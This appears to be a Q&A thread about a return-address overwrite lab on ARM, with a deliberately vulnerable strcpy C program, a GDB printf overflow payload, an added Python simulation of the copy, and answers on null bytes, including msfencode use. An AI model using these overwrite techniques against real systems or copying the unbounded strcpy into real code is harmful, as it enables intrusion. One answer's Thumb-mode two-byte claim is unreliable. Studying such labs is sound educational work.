
I am trying to follow the research paper by Tiger Security on ARM exploitation: Link

For the simple stack overflow exploitation, the code is:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Target function: never called normally, reached only by hijacking the return address */
void donuts(void) {
    puts("Donuts...");
    exit(0);
}

/* Deliberately vulnerable: strcpy copies arg into a 10-byte buffer with no bounds check */
void vuln(char *arg) {
    char buff[10];
    strcpy(buff, arg);
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    vuln(argv[1]);
    return 0;
}

However, when I run it on my Debian ARM machine running on QEMU under Ubuntu, everything runs fine, except the part where I have to put in the addresses that will fill up the frame pointer, stack pointer and the return address.

So the final resulting command to run under GDB (in my case) becomes:

r `printf "AAAABBBBCCCC\x94\xac\x8b\xbe\[FP 4 bytes here]\x38\x84"`

In my case the desired values are:

SP: 0xbe8bac94
FP: 0x000084ac
Return address: 0x00008438

Since the FP contains null bytes in the middle, is there any way I could use that in my exploitation? Since they are in the middle, I am not able to use \xac\x84.

Gilles 'SO- stop being evil'
Robert Shane
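Added example (not part of the question or any of the answers): a Python model of what strcpy() does with the payload above. The frame layout it assumes (12 bytes of filler, then the saved SP, saved FP and return-address slots, 4 bytes each, little-endian) is taken from the printf payload in the question; the pre-existing stack contents are constructed. Running it shows where the NUL bytes of the FP value land and that the copy stops at the first of them, so the return-address slot is never reached.

```python
import struct

# Frame layout assumed from the question's payload:
# "AAAABBBBCCCC" (buff[10] plus alignment padding), then three 4-byte slots.
BUFF_LEN = 12
SLOT = 4
FRAME_LEN = BUFF_LEN + 3 * SLOT   # 24 bytes

# Values from the question (little-endian ARM)
DESIRED_SP = 0xbe8bac94
DESIRED_FP = 0x000084ac
DESIRED_RA = 0x00008438


def build_payload(sp, fp, ra):
    """Bytes the printf command in the question emits: filler plus three packed words."""
    return b"AAAABBBBCCCC" + struct.pack("<III", sp, fp, ra)


def nul_positions(payload):
    """Offsets of every NUL byte in the payload; strcpy stops at the first one."""
    return [i for i, b in enumerate(payload) if b == 0]


def simulate_strcpy(frame, payload):
    """Model strcpy(buff, arg): copy bytes up to and including the first NUL,
    running past buff into whatever follows it in the frame."""
    out = bytearray(frame)
    for i, b in enumerate(payload):
        if i >= len(out):
            break
        out[i] = b
        if b == 0:
            break
    else:
        # No NUL in the payload at all: the terminating NUL still gets written
        if len(payload) < len(out):
            out[len(payload)] = 0
    return bytes(out)


def slot_values(frame):
    """Decode the saved SP, saved FP and return-address slots of a frame."""
    sp, fp, ra = struct.unpack_from("<III", frame, BUFF_LEN)
    return {"sp": sp, "fp": fp, "ra": ra}


def run(fp_value):
    """Copy a payload with the given FP value over a constructed frame and
    report which NUL bytes it contains and what ended up in each slot."""
    # Constructed stand-in for the bytes already on the stack before the copy
    original = bytes(range(0x10, 0x10 + FRAME_LEN))
    payload = build_payload(DESIRED_SP, fp_value, DESIRED_RA)
    after = simulate_strcpy(original, payload)
    return {
        "nuls_at": nul_positions(payload),
        "original": slot_values(original),
        "after": slot_values(after),
    }


if __name__ == "__main__":
    result = run(DESIRED_FP)
    print("NUL bytes at payload offsets:", result["nuls_at"])
    for name in ("sp", "fp", "ra"):
        print(f"{name}: before 0x{result['original'][name]:08x} "
              f"after 0x{result['after'][name]:08x}")
```

The SP slot comes through intact because 0xbe8bac94 has no zero bytes, but the FP slot receives only \xac\x84 followed by the terminator, and the return-address slot keeps its old contents. That is exactly the gap the asker ran into: the two NUL bytes sit at offsets 18 and 19, in front of the return address, so nothing after them is copied.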

3 Answers


Why would you need a specific FP? The saved FP is there to be loaded back into the corresponding register by the vuln() function when it exits; but that function does not access it in any way, so it could have any value. The loading back of FP is for the benefit of whatever code will execute immediately afterwards: normally the caller of vuln() (who wants to get his FP back), but, in your case, your exploit code, since you hijack the return address. It is then up to you to deal with a nonsensical FP value (that's your code: you can make it recompute an adequate value of FP with a few zero-free opcodes).

Edit: this article, especially section 2.4 ("Getting a known value in a register") might be enlightening.

Thomas Pornin

If you are having an issue with null bytes, then try to encode the shellcode before using it, to eliminate the null bytes. I assume you have got Metasploit and are able to use the encoder. Here is how it works.

# Raw shellcode bytes go here (placeholder kept from the answer)
shell = b"\x77\x... your shellcode"
# Binary mode so the bytes are written unchanged
with open('shellcode.bin', 'wb') as f:
    f.write(shell)

or you can also use

echo -e "shellcode" >> shellcode.bin

and execute the following

/msfencode -b '\x00' -i /pentest/exploits/shellcode.bin -t c

I hope the above methods help you to get going. Good luck!

3ntr0py

Comment: Thanks for your reply. It's actually the return address which contains the null byte, not the shellcode. The return address has to be 4 bytes, so I can't use msfencode. – Robert Shane Nov 25 '12 at 15:26

Your assumption is wrong. You don't need to use the full 4-byte address of the FP, since your CPU will understand Thumb mode. As a result your exploit will look like:

printf "AAAABBBBCCCC\x94\xac\x8b\xbe\[FP 2 bytes without \x00\x00 here]\x38\x84"

Sama Azari